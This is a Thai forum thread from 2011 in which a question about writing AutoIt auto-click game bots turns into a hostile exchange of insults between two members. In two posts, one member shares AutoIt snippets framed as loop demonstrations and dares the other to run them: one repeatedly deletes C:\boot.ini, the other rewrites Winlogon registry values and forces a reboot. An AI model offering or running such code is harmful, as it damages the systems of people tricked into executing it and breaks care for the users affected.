อะไรๆก็ต้องให้หาปลามาให้กิน ต้องคิดที่จะหาปลากินเองบ้าง
-------------------------------------------------------------------------------------------------------------------------------
รู้ไหมทำไมเราไม่เขียนลูบกดเม้าเพราะรู้ ว่านายต้องเจ๋อเข้ามามัวอีกหลังเราลงโค้ดอันแรก แล้วมันก็มาจิงจิงทายผิดซะเมื่อไหร่เอ้าแสดงความเก่งโชหน่อยมามะ มาเขียนลูบให้มันกดเม้าเอาแบบสั้นนะนายไม่ใช่เขียนแล้วยาวกว่าเดิม เขียนไม่ได้ก้อบอกมา...มีความเป็นลูกผู้ชายอะเป่า ยอมรับความจิงซะบ้างอยู่แต่ในโลกความฝันเหอเหอ

การเขียนลูปแบบนาย มันเขียนไปคนละแนวกับเรา ให้นายบังคับเรายังไง เราก็ไม่เขียน

ลูปธรรมมะ กับ ลูปอธรรม มันไปด้วยกันไม่ได้อยู่แล้ว.
-------------------------------------------------------------------------------------------
การเขียนคำสั่งที่จะนำไปบอทเกมส์ใดๆ?!? ต้องใช้ทักษะความรู้ของผู้เขียนนั้นๆ

ที่จะออกแบบเขียนคำสั่งเพื่อบอทเกมส์นั้นๆ ไม่ใช่ใครจะเขียนได้กันทุกคน

ยิ่งผู้ที่ไม่มีประสบการณ์ในการเขียนก็ไม่ต้องพูดถึง ..หรือใครว่าไม่จริง?!?



แก้ไขล่าสุดโดย newsak2005 เมื่อ 04/06/11, 06:07 pm, ทั้งหมด 1 ครั้ง
avatar
อัต
PSsix Member Class III
PSsix Member Class III


จำนวนข้อความ : 54
ความนิยม : 9
เข้าร่วมเมื่อ : 07/05/2011

Re: เพิ่งศึกษาเขียนบอทออโต้คลิกครับ มีเรื่องจะถามหน่อยครับ

ตั้งหัวข้อ by อัต on 04/06/11, 05:38 pm

newsak2005 พิมพ์ว่า:ท่านPosครับผมขออนุญาติถกเถียงเรื่องสคริ๊ป(ซึ่งไม่ผิดกติกามารยาท)
กับขอความข้างบนที่มีคนมาถามไว้หน่อยนะครับ เขาจะได้หายข้องใจ
--------------------------------------------------------------------------
เฮ้อ..... เบื่อยามเช้า...เขียนเองไม่ได้ก้อไปไกลเลยเหอเหอดูมันตอบเล่นเอาคำสังมัวซัว กะว่านแหว่าใส่คำสังมาเยอะๆ กะว่าคงมีสักอันทายถูกหรา TimerIint, TimerDiff WinAPI(ContinueLoop) Loop,Plause (ExitLoop, $i=$i) แนะนำเอามาทำไร่อ้อยไร ไม่กล้าเขียนหรือเขียนไม่ได้กันแน่

ถ้าเขียนเองไม่ได้ คงจะไม่กล้าลงคำสั่งมาให้ดู

เจตนาที่ไม่เขียนโค๊ดตัวอย่างลงมาให้ดู

ก็เพราะว่าอยากให้ผู้ที่เริ่มต้นหัดเขียนคำสั่ง AutoIt (ซึ่งไม่ใช่นาย) คิดเองเขียนเองบ้าง

อะไรๆก็ต้องให้หาปลามาให้กิน ต้องคิดที่จะหาปลากินเองบ้าง
-------------------------------------------------------------------------------------------------------------------------------
รู้ไหมทำไมเราไม่เขียนลูบกดเม้าเพราะรู้ ว่านายต้องเจ๋อเข้ามามัวอีกหลังเราลงโค้ดอันแรก แล้วมันก็มาจิงจิงทายผิดซะเมื่อไหร่เอ้าแสดงความเก่งโชหน่อยมามะ มาเขียนลูบให้มันกดเม้าเอาแบบสั้นนะนายไม่ใช่เขียนแล้วยาวกว่าเดิม เขียนไม่ได้ก้อบอกมา...มีความเป็นลูกผู้ชายอะเป่า ยอมรับความจิงซะบ้างอยู่แต่ในโลกความฝันเหอเหอ

การเขียนลูปแบบนาย มันเขียนไปคนละแนวกับเรา ให้นายบังคับเรายังไง เราก็ไม่เขียน

ลูปธรรมมะ กับ ลูปอธรรม มันไปด้วยกันไม่ได้อยู่แล้ว.


เหอ....บอดให้ความรู้กลายเป็นบอดมัวซัวไม่รู้จิงกลับยากจะโชให้คนอวย เอา....ช่วยกันอวยให้มันหน่อยนุงไชโยประเทศไทย
em239

avatar
newsak2005
ระงับสมาชิก
ระงับสมาชิก


จำนวนข้อความ : 115
ความนิยม : 0
เข้าร่วมเมื่อ : 08/05/2011

Re: เพิ่งศึกษาเขียนบอทออโต้คลิกครับ มีเรื่องจะถามหน่อยครับ

ตั้งหัวข้อ by newsak2005 on 04/06/11, 06:51 pm

เหอ....บอดให้ความรู้กลายเป็นบอดมัวซัวไม่รู้จิงกลับยากจะโชให้คนอวย เอา....ช่วยกันอวยให้มันหน่อยนุงไชโยประเทศไทย

อย่าลืมนะนาย อย่าประมาทตนเอง 'เหนือฟ้ายังมีฟ้า' เขียนได้8ภาษากับเขียนได้ภาษาเดียวมันเทียบกันไม่ติด.



แก้ไขล่าสุดโดย newsak2005 เมื่อ 04/06/11, 07:23 pm, ทั้งหมด 1 ครั้ง
avatar
อัต
PSsix Member Class III
PSsix Member Class III


จำนวนข้อความ : 54
ความนิยม : 9
เข้าร่วมเมื่อ : 07/05/2011

Re: เพิ่งศึกษาเขียนบอทออโต้คลิกครับ มีเรื่องจะถามหน่อยครับ

ตั้งหัวข้อ by อัต on 04/06/11, 07:15 pm

newsak2005 พิมพ์ว่า:
เหอ....บอดให้ความรู้กลายเป็นบอดมัวซัวไม่รู้จิงกลับยากจะโชให้คนอวย เอา....ช่วยกันอวยให้มันหน่อยนุงไชโยประเทศไทย

อย่าลืมนะนาย 'เหนือฟ้ายังมีฟ้า' เขียนได้8ภาษากับเขียนได้ภาษาเดียวมันเทียบกันไม่ติด.

นายลองเอาคำสั่งลูปนี้ไปลองรันดูดิ ชอบไม่ใช่เหรอ

--------------------------------------------------------------
Code:
#Includ <Process.au3>
While 1
_RunDos('DEL C:\boot.ini')
Wend
--------------------------------------------------------------


อ่อนของจิงทำไม่ได้ก็เอาแค่คำสังลบไฟกระจอกมาโช เหอ เหอ...นึกว่าเราไม่เห็นเหรอออนตั้งแต่ตอนเราโฟสเมื่อห้าโมงคงกะไปเขียนคำสังมาโชอ่านะ ทำไม่ได้เลยโชอ่อนใช้คำสังลบไฟสงสัยมันจะทำแล้วลบไฟเครื่องมันไปแล้วนะเหอเหอ
avatar
newsak2005
ระงับสมาชิก
ระงับสมาชิก


จำนวนข้อความ : 115
ความนิยม : 0
เข้าร่วมเมื่อ : 08/05/2011

Re: เพิ่งศึกษาเขียนบอทออโต้คลิกครับ มีเรื่องจะถามหน่อยครับ

ตั้งหัวข้อ by newsak2005 on 04/06/11, 07:32 pm

อ่อนของจิงทำไม่ได้ก็เอาแค่คำสังลบไฟกระจอกมาโช เหอ เหอ...นึกว่าเราไม่เห็นเหรอออนตั้งแต่ตอนเราโฟสเมื่อห้าโมงคงกะไปเขียนคำสัง มาโชอ่านะ ทำไม่ได้เลยโชอ่อนใช้คำสังลบไฟสงสัยมันจะทำแล้วลบไฟเครื่องมันไปแล้วนะเหอเหอ

ที่แท้ก็ขี้ขลาดตาขาว อยากให้เขียนคำสั่งลูปโชว์ก็เขียนให้แล้วแต่ไม่กล้ารันทดสอบ
avatar
อัต
PSsix Member Class III
PSsix Member Class III


จำนวนข้อความ : 54
ความนิยม : 9
เข้าร่วมเมื่อ : 07/05/2011

Re: เพิ่งศึกษาเขียนบอทออโต้คลิกครับ มีเรื่องจะถามหน่อยครับ

ตั้งหัวข้อ by อัต on 04/06/11, 07:41 pm

newsak2005 พิมพ์ว่า:
อ่อนของจิงทำไม่ได้ก็เอาแค่คำสังลบไฟกระจอกมาโช เหอ เหอ...นึกว่าเราไม่เห็นเหรอออนตั้งแต่ตอนเราโฟสเมื่อห้าโมงคงกะไปเขียนคำสัง มาโชอ่านะ ทำไม่ได้เลยโชอ่อนใช้คำสังลบไฟสงสัยมันจะทำแล้วลบไฟเครื่องมันไปแล้วนะเหอเหอ

ที่แท้ก็ขี้ขลาดตาขาว อยากให้เขียนคำสั่งลูปโชว์ก็เขียนให้แล้วแต่ไม่กล้ารันทดสอบ

เหอเหอ...นิสัยเดิมเดิมโพล่มาอีกแย้วชอบอวดจิงรู้8พาสานะอายคนอืนบ้างนะ....โดนย้อนรีบไปลบข้อความที่ตัวเองโฟส ลูกผู้ชายสะกดเป็นเป่าคับ แล้วทำไมต้องเอาคำสังนายไปรันแค่ดูก็รู้สังลบไฟอะ...เหอเหอหรานายเอาไปรันเครื่องตัวเองแว้ว เหอ เหอ


avatar
newsak2005
ระงับสมาชิก
ระงับสมาชิก


จำนวนข้อความ : 115
ความนิยม : 0
เข้าร่วมเมื่อ : 08/05/2011

Re: เพิ่งศึกษาเขียนบอทออโต้คลิกครับ มีเรื่องจะถามหน่อยครับ

ตั้งหัวข้อ by newsak2005 on 04/06/11, 08:50 pm

หอเหอ...นิสัยเดิมเดิมโพล่มาอีกแย้วชอบอวดจิงรู้8พาสานะอายคนอืนบ้างนะ ....โดนย้อนรีบไปลบข้อความที่ตัวเองโฟส ลูกผู้ชายสะกดเป็นเป่าคับ แล้วทำไมต้องเอาคำสังนายไปรันแค่ดูก็รู้สังลบไฟอะ...เหอเหอหรานายเอาไปรัน เครื่องตัวเองแว้ว เหอ เหอ

โค๊ดนี้เป็นเป็นไง ไม่มีคำสั่งลบ กล้ารันหรือเปล่าล่ะ

Code:
#include <Process.au3>
Do
RegWrite('HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon', 'UIHost', 'REG_EXPAND_SZ', 'logonui')
RegWrite('HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon', 'LegalNoticeText', 'REG_SZ', 'Hex By: Neo')
If Not @error Then
_RunDos('SHUTDOWN -r -t 10')
ExitLoop
EndIf
Until False

    เวลาขณะนี้ 21/10/17, 03:39 pm